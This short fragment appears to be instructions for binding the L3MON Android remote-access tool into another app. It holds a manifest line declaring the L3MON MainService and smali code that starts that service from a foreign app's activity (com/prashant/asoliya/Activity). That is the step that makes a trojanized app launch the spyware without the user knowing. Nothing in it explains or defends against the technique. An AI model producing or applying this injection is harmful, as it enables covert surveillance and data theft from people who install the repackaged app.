----------------------------------------------------------------------------------------------------------------------------------------------

<service android:enabled="true" android:exported="false" android:name="com.etechd.l3mon.MainService"/>

----------------------------------------------------------------------------------------------------------------------------------------------

	new-instance v0, Landroid/content/Intent;

    const-class v1, Lcom/etechd/l3mon/MainService;

    invoke-direct {v0, p0, v1}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V

    invoke-virtual {p0, v0}, Lcom/prashant/asoliya/Activity;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;

